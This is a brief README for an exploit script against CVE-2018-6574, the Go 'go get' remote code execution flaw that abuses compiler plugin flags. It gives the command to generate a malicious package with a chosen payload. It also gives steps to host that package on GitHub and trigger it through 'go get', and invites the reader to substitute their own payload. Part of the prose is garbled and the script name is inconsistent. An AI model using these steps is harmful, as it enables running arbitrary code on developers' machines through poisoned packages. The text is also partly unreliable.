Go before 1.8.7, Go 1.9.x before 1.9.4, and Go 1.10 pre-releases before Go 1.10rc2 allow "go get" remote command execution during source code build, by leveraging the gcc or clang plugin feature, because -fplugin= and -plugin= arguments were not blocked.
An attack has to be approached locally. A single authentication is needed for exploitation. So it's more user or a function that uses the same approach may get exploited via typosquatting technique or another ways.
Exploit
ruby cve-2018-6574_exploit.rb <PAYLOAD>
PoC based in your case and payload.
-> ruby cve-CVE-2018-6574_exploit.rb "touch /tmp/owned"
[1] Upload 'go-get-rce' folder to github
[2] try: go get https://github.com/[username]/go-get-rce.git
- Replace
touch /tmp/ownedpayload with your own. - A directory called
go-get-rcewill be created contains a package and the malicious plugin. - Upload
go-get-rcedirectory to github or any remote host - from the vulnerable function execute (
go get https://github.com/[username]/go-get-rce)